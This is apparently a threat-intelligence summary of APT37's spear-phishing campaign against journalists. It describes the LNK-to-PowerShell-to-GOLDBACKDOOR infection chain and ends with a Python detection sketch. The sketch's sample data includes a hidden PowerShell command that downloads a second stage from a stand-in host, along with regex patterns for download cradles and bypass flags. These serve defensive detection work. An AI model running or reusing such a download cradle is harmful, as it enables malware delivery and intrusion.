APT37 Targeting Journalists and Researchers



NK News, an American news outlet covering North Korea, has identified a set of suspicious spear-phishing emails as a campaign by the North Korean threat group APT37 (also tracked as Ricochet Chollima). The campaign appears to target journalists and researchers reporting on sensitive issues within the country. In March 2022 the news organization engaged Stairwell's cybersecurity team, which discovered a new malware family named GOLDBACKDOOR. The threat group uses a multi-stage infection process to evade defenses. A compressed file attached to the phishing email contains Windows LNK (shortcut) files. When a shortcut is executed, a PowerShell script launches, presenting a decoy document to distract the victim while downloading and executing malicious shellcode. The downloaded payload, Fantasy, then performs process injection to deploy the GOLDBACKDOOR malware. GOLDBACKDOOR is a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, "Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall."
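The first stage described above (a double-clicked LNK spawning PowerShell that opens a decoy document and pulls a second stage from the web) leaves a recognisable process-creation footprint. The following detection sketch, added here as an illustration and not part of the Stairwell or Anvilogic analysis, scores simplified Sysmon-style events against those indicators; the field names, regexes and threshold are assumptions, and the sample events are constructed.

```python
import re

# Indicators drawn from the described chain: PowerShell spawned by the desktop
# shell (what a double-clicked LNK produces), hidden/bypass flags, a download
# cradle, and a decoy document opened in the same command line.
_DOWNLOAD = re.compile(r"Net\.WebClient|DownloadData|DownloadString|Invoke-WebRequest|\biwr\b", re.I)
_HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-noni\b", re.I)
_DECOY = re.compile(r"Start-Process\s+['\"][^'\"]+\.(docx?|pdf|hwp)['\"]", re.I)
_FROM_SHELL = re.compile(r"\\explorer\.exe$", re.I)


def score_event(ev: dict) -> list[str]:
    """Return the indicator names matched by one process-creation event."""
    if not ev["image"].lower().endswith("powershell.exe"):
        return []
    reasons = []
    if _FROM_SHELL.search(ev["parent"]):
        reasons.append("powershell_from_explorer")
    if _HIDDEN.search(ev["cmdline"]):
        reasons.append("hidden_or_bypass_flags")
    if _DOWNLOAD.search(ev["cmdline"]):
        reasons.append("download_cradle")
    if _DECOY.search(ev["cmdline"]):
        reasons.append("opens_decoy_document")
    return reasons


def find_suspicious(events: list[dict], min_hits: int = 3) -> list[tuple[int, list[str]]]:
    """Flag events matching at least min_hits indicators; one or two alone are common admin use."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_hits:
            hits.append((i, reasons))
    return hits


# Constructed sample events (hypothetical; not taken from the report).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"Start-Process 'C:\\Users\\j\\Downloads\\report.docx'; "
                "$c=New-Object Net.WebClient; $c.DownloadData('http://stage2.invalid/p')\""},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -nop -c \"Invoke-WebRequest https://intranet.invalid/tool.zip -OutFile t.zip\""},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for idx, why in find_suspicious(SAMPLE_EVENTS):
        print(idx, why)
```

Lowering `min_hits` to 2 also surfaces the intranet download in event 2, which shows why the threshold belongs in a tunable parameter rather than the pattern itself.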

